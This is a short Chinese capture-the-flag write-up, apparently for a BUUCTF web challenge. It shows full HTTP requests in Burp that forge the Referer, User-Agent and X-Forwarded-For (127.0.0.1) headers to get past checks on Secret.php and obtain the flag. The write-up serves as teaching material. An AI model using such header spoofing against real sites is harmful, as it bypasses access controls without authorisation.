打开环境,查看源码
找到了secret.php
访问之后说:必须从这个https://www.Sycsecret.com点过来的才有效
开burp抓包吧,丢到repeater里面,添加referer头,referer头就是证明你从哪里点进来的。
GET /Secret.php HTTP/1.1 Host: node3.buuoj.cn:29856
referer:https://www.Sycsecret.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
GO
又告诉你必须要使用Syclover这个浏览器,那就改呗
GET /Secret.php HTTP/1.1
Host: node3.buuoj.cn:29856
referer:https://www.Sycsecret.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Syclover
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Go
又说必须本地打开才行
怎么样才能本地打开呢?
这里就要用到X-Forwarded-For这个扩展头
X-Forwarded-For 是一个 HTTP 扩展头部。HTTP/1.1(RFC 2616)协议并没有对它的定义,它最开始是由Squid 这个缓存代理软件引入,用来表示 HTTP 请求端真实 IP。如今它已经成为事实上的标准,被各大 HTTP代理、负载均衡等转发服务广泛使用,并被写入 RFC 7239(Forwarded HTTP Extension)标准之中。
设置X-Forwarded-For:127.0.0.1
或者X-Forwarded-For:localhost
GET /Secret.php HTTP/1.1
Host: node3.buuoj.cn:29856
referer:https://www.Sycsecret.com
X-Forwarded-For:127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0)
Gecko/20100101 Syclover
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
得到flag